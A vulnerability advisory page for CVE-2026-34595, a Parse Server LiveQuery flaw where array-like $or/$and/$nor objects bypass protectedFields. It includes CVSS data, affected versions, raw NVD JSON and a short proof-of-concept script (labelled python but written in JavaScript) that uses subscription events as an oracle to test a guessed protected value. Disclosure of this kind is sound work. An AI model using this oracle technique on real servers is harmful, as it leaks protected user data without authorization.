Security Vulnerability Report
中文
CVE-2026-34595 CVSS 4.3 MEDIUM

CVE-2026-34595

Published: 2026-03-31 16:16:34
Last Modified: 2026-04-02 17:12:57
Source: [email protected]

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.70 and 9.7.0-alpha.18, an authenticated user with find class-level permission can bypass the protectedFields class-level permission setting on LiveQuery subscriptions. By sending a subscription with a $or, $and, or $nor operator value as a plain object with numeric keys and a length property (an "array-like" object) instead of an array, the protected-field guard is bypassed. The subscription event firing acts as a binary oracle, allowing the attacker to infer whether a protected field matches a given test value. This issue has been patched in versions 8.6.70 and 9.7.0-alpha.18.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha1:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha10:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha11:*:*:*:node.js:*:* - VULNERABLE
Parse Server < 8.6.70
Parse Server < 9.7.0-alpha.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-34595: Parse Server LiveQuery protectedFields Bypass // This script demonstrates how an array-like object can bypass permission checks. const Parse = require('parse/node'); // Initialize Parse connection (requires valid credentials) Parse.initialize('YOUR_APP_ID', 'YOUR_JS_KEY', 'YOUR_MASTER_KEY'); Parse.serverURL = 'http://localhost:1337/parse'; // Target a class that has protectedFields configured const TargetClass = Parse.Object.extend('SensitiveData'); const query = new Parse.Query(TargetClass); // Construct the malicious payload using an object with numeric keys // instead of a standard array for the $or operator. const arrayLikePayload = { "0": { "secretField": "admin_password" }, // The value we want to test "length": 1 }; // Inject the payload into the query query._where.$or = arrayLikePayload; // Subscribe to the LiveQuery const subscription = await query.subscribe(); console.log('[*] Listening for events...'); // If the 'create' or 'update' event fires, it means the condition matched. // This acts as a binary oracle confirming the value of the protected field. subscription.on('update', (object) => { console.log('[+] Match found! The protected field likely matches the test value.'); }); subscription.on('create', (object) => { console.log('[+] Match found! The protected field likely matches the test value.'); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34595", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:34.087", "lastModified": "2026-04-02T17:12:56.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.70 and 9.7.0-alpha.18, an authenticated user with find class-level permission can bypass the protectedFields class-level permission setting on LiveQuery subscriptions. By sending a subscription with a $or, $and, or $nor operator value as a plain object with numeric keys and a length property (an \"array-like\" object) instead of an array, the protected-field guard is bypassed. The subscription event firing acts as a binary oracle, allowing the attacker to infer whether a protected field matches a given test value. This issue has been patched in versions 8.6.70 and 9.7.0-alpha.18."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "8.6.70", "matchCriteriaId": "832B033D-003F-489D-BAAD-D12E1804586D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.7.0", "matchCriteriaId": "E3DFF698-B3EE-4DCA-BAF3-9BE52F0F77D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "3A140D3A-AECC-4CA1-958C-3CA53E313B27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha10:*:*:*:node.js:*:*", "matchCriteriaId": "80D441B8-3B25-40E5-82E2-71E2A5E2F58F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha11:*:*:*:node.js:*:*", "matchCriteriaId": "3CDAE590-5625-4B7C-9B52-23A6725F1B92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha12:*:*:*:node.js:*:*", "matchCriteriaId": "BB2DF38D-26A3-4AB7-8FD3-E9A83995A3BB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha13:*:*:*:node.js:*:*", "matchCriteriaId": "8EFBDB24-8B3B-48E9-9332-C283F9C314F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha14:*:*:*:node.js:*:*", "matchCriteriaId": "DEB97B07-FB76-4DF6-B068-C88963E27E21"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha15:*:*:*:node.js:*:*", "matchCriteriaId": "268C8423-0DA1-4C87-95D9-CF0D32504E89"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha2:*:*:*:node.js:*:*", "matchCriteriaId": "BEDAEFBC-DA77-4998-BDD6-A139E15E5CC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pars ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.